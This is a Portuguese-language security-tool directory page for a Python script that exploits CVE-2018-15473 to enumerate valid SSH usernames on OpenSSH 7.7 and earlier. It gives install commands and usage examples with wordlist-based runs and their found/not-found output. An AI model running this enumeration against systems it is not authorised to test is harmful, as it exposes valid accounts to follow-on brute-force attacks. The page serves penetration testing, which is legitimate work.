Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2018-15473 — Script em Python para enumerar nomes de usuário SSH válidos explorando a CVE-2018-15473, uma vulnerabilidade de enumeração de usuários no OpenSSH até a versão 7.7. | Kitploit
Ferramentas/GitHubGitHub/wh1t3fox/cve-2018-15473
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de Penetração
GitHubwh1t3fox/cve-2018-15473

cve-2018-15473

Script em Python para enumerar nomes de usuário SSH válidos explorando a CVE-2018-15473, uma vulnerabilidade de enumeração de usuários no OpenSSH até a versão 7.7.

Ver Repositório
3há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-15473

OpenSSH até 7.7 está sujeito a uma vulnerabilidade de enumeração de usuários por não adiar a saída para um usuário autenticador inválido até que o pacote contendo a solicitação tenha sido totalmente analisado, relacionado a auth2-gss.c, auth2-hostbased.c e auth2-pubkey.c.

Instalação

Você pode precisar instalar o pacote openssl-dev equivalente à sua distribuição

root@kitploit:~
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - OR - 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Exemplos

Um único nome de usuário

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Use uma wordlist com 10 threads (o padrão é 4)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

Endereço IPv6 na porta 2222 e VERBOSIDADE AUMENTADA!

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
Baixar ferramenta